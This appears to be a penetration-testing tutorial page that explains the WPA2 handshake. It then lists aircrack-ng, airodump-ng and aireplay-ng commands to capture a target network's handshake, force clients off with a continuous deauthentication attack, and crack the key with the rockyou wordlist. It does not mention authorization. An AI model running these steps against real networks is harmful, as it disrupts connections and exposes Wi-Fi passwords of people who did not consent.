WPA Handshake Capture
What is the WPA2 handshake
The WPA2 handshake is a process that occurs when a client device wants to join a Wi-Fi network secured with WPA2 encryption. It involves the exchange of messages between the client device and the access point (AP) to establish a secure connection. During the handshake, the client device and AP authenticate each other's identities, negotiate encryption keys, and establish a secure communication channel. This process helps prevent unauthorized access to the network and ensures that data transmitted over the network is encrypted and protected. The WPA2 handshake is a crucial security measure in Wi-Fi networks and helps safeguard against unauthorized access and data interception.
Steps to follow to capture and crack the WPA2 handshake
kill conflict in prosses of the WIFI
sudo airmon-ng check kill
Start monitor mode
sudo airmon-ng start [interface]
Get the Victim's MAC address and channel
sudo airodump-ng [interface]
you can display only the victim AP
sudo airodump-ng [interface] -d [victim mac adress]
Now you should use two different
first window
sudo airodump-ng -w hack1 -c [victim channel number] --bssid [victim mac adress] [interface]
second window : deauth attack
sudo aireplay-ng --deauth 0 -a [victim mac adress] [interface]
then you should stop both windows bu just pressing Ctrl + C
Use Wireshark to open hack1 file
wireshark hack1-01.cap
Filter Wireshark messages for EAPOL
Stop monitor mode
sudo airmon-ng stop [interface]
Crack file with Rockyou or other wordlist
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
If you can't crack the file using wordlist you can brute force it using Hashcat
for more details check:
Hashcat Crackingin case no is connected to the WIFI we are obliged to use an PMKID Attack
PMKID Hash CaptureOther YouTube Tutorials
You can check those YouTube Videos/Tutorials about WPA Handshake Capture:
This YouTube Video created by David Bombal
This YouTube Video created by Hak5
This YouTube Video created by InfoSec Pat
Last updated